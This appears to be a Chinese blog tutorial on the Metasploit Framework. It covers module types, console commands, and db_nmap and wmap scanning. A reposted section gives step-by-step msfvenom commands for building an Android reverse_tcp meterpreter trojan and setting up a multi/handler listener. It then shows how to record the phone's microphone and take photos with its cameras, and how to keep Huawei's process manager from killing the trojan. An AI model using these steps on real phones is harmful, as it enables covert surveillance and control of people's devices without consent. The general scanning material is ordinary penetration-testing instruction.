Metasploit框架

Metasploit框架简介

Metasploit框架简称 MSF。

MSF 是免费的,下载后(Kali自带)可以获取、对计算机软件漏洞搞事情。

MSF 本身附带了数百个已知软件漏洞的专业漏洞工具,我们可以通过 MSF 快速发现漏洞并实施攻击,当然需要在授权的情况下,不然你惨了。

 

MSF 的功能由基本模块构成:

  • Auxiliary (辅助模块)
  • Exploits  (攻击模块)
  • Payload  (攻击载荷模块)
  • Post        (后渗透攻击模块)
  • Encoders (编码模块)

这些模块,就构建了渗透测试流程:信息收集(Auxiliary) -> 发掘漏洞(Exploits) -> 漏洞利用(Payload) -> 权限提升(Post) -> 清理痕迹。

 

还有一些简单好用的基本指令

  • help/?            : 帮助菜单
  • exit                : 退出MSF控制台
  • Back              : 返回上一级
  • info                : 显示一个或者多个模块的信息
  • show              :显示所给类型的模块
  • background   : 将当前操作在后台运行
  • use                : 使用所选择的模块
  • set                 : 设置选项
  • unset             : 取消设置的选项 

 

首先,我们应该开启数据库:

  • 开启数据库:service postgresql start
  • 数据库状态:service postgresql status

Metasploit框架_第1张图片 启动成功,正在运行...

 

接着,初始化 msf 数据库:

  • msfdb init

Metasploit框架_第2张图片

ta会帮我们创建新的数据库和用户。

 

下一步,就是开启 MSF:

  • msfconsole (tab键自动补全)

Metasploit框架_第3张图片

上面说 版本是 5.0,攻击模块exploits 有 1886 个 ......

 

按步骤来,这一步是查看数据连接状态:

  • db_status

 

MSF 的基本模块:

  • Auxiliary 模块,输入   show auxili

Metasploit框架_第4张图片

这些模块的命名规则是 :功能/服务/名称  ,如 scanner/smb/smb_ms17_010。

Rank 表示好用级别:normal(正常),excellent(优秀),good(良好),average(平均)      

其余的模块同:

  • Exploits 模块,输入 show exploits
  • Payload 模块,输入 show payload
  •  ...... 

 

 

Metasploit框架_第5张图片 显示模块信息: info windows/smb/ms17_010_eternalblue

 

 


Metasploit框架扫描模块

所用的模块叫 db_nmap,功能和 namp 类似。

常用端口扫描指令:

  • UDP 扫描                -sU
  • TCP 扫描                -sT
  • 扫描系统版本          -sV
  • 禁止反向域名解析   -n
  • 反向域名解析          -R
  • 启用 IPV6 扫描        -6
  • 全面的漏洞扫描       --script=vuln

扫描前:先打开数据库 service postgresql start,再使用 mfsconsole 打开 MSF 。

开始扫描即可,如:

  • 全面扫描:db_nmap --script=vuln url/ip (扫描自己搭建的环境,扫描网站需要经过授权)。
  • 指纹识别:db_nmap -sV -v url/ip。
Metasploit框架_第6张图片 截选,CVE部分

 

扫描插件 wmap,使用扫描插件前需要先加载。

  • 加载插件                      load wmap
  • 添加目标                      wmap_sites -a url
  • 添加目标URL地址       wmap_targets -d Id
  • 测试目标                      wmap_run -e
  • 查看漏洞详细信息        wmap_vulns

Metasploit框架_第7张图片

添加目标如, wmap_sites -a 120.241.186.xxxxxx

  • wmap_sites -l 可以查看所有目标

Metasploit框架_第8张图片

添加刚刚的 id(1),wmap_targets -t Id

  • wmap_targets -d 1,

测试目标, wmap_run -e。

Metasploit框架_第9张图片 截选

会有很多信息出来,最后查看漏洞详细信息 :wmap_vulns,会得到很多目录,找一找有没有敏感目录。

自己收集的话,就比较麻烦,使用 MSF 就只需要等待(一般 10 分钟内)。

每个工具收集的信息都是不全的或误报,因此多多尝试,最好都用一遍,信息就更全面。

 

找到漏洞后,可以在本地的漏洞库找找。

输入 quit 退出 Metasploit框架。

  • 查看所有漏洞:输入 searchsploit -t 
  • 查看指定漏洞(如 ftp、windows):输入 searchsploit ftp/windows

 

Metasploit框架_第10张图片

匹配漏洞后,调用脚本攻击即可。

在线漏洞库:https://www.exploit-db.com/searchsploit

 


Metasploit框架入侵安卓手机(转载)

环境准备:Kali系统、虚拟机、无线网卡,都在博客《WIFI破解与加固》里。

首先,打开虚拟机,调用 Kali,插上无线网卡,连上WIFI,在终端输入 ifconfig 查看本机在局域网内的 ip。

Metasploit框架_第11张图片

使用 msfvenom 生成 apk 木马:

  • msfvenom -p android/meterpreter/reverse_tcp LHOST=你在局域网内的IP(我的是192.168.0.13) LPORT=监听的端口(我用的是8888) R > /root/木马的名字(我用的是1).apk

而后打开主目录就能看到刚刚生成的木马了

Metasploit框架_第12张图片

接下来把它发送到手机上,而后启动msf,输入命令: msfconsole

依次执行:

  • 加载攻击模块:use exploit/multi/handler
  • 选择要使用的Payload:set payload android/meterpreter/reverse_tcp  

Metasploit框架_第13张图片

接下来输入:show options

Metasploit框架_第14张图片

箭头指着的就是需要改的内容

  • 输入:set LHOST(你的ip)
  • 接着输入: set LPORT(你刚刚输入的端口)

Metasploit框架_第15张图片

接着把木马发送到手机上

而后终端执行exploit

再在手机上运行刚刚安装的木马

Metasploit框架_第16张图片

弹出这样的对话,这样你就控制了这个手机。

接下来可以执行一些命令

  • 比如 sysinfo 就是查看系统

Metasploit框架_第17张图片

远程录音

  • 输入:record_mic -d 13

Metasploit框架_第18张图片

列出安卓手机上的摄像头

  • 输入:webcam_list

远程拍照

  • 输入:webcam_snap -i 1,1 是使用后摄像头拍照

Metasploit框架_第19张图片

更多的命令,输入 help 就可以查看指令:

Metasploit框架_第20张图片

 

如果是华为手机可能有错误,如下:

Metasploit框架_第21张图片

手机杀进程就是这样,在手机管家里,把木马设置从自动管理改为手动管理:

  • 允许后台活动;(免杀进程)
  • 允许自启动;(可以持续控制,就不需要点开)

 

作者:@M0rta1s

转载出处:https://www.cnblogs.com/M0rta1s/p/12041734.html


Metasploit框架密码爆破模块

 

 

 

 

 

 

 

 

你可能感兴趣的:(Metasploit框架)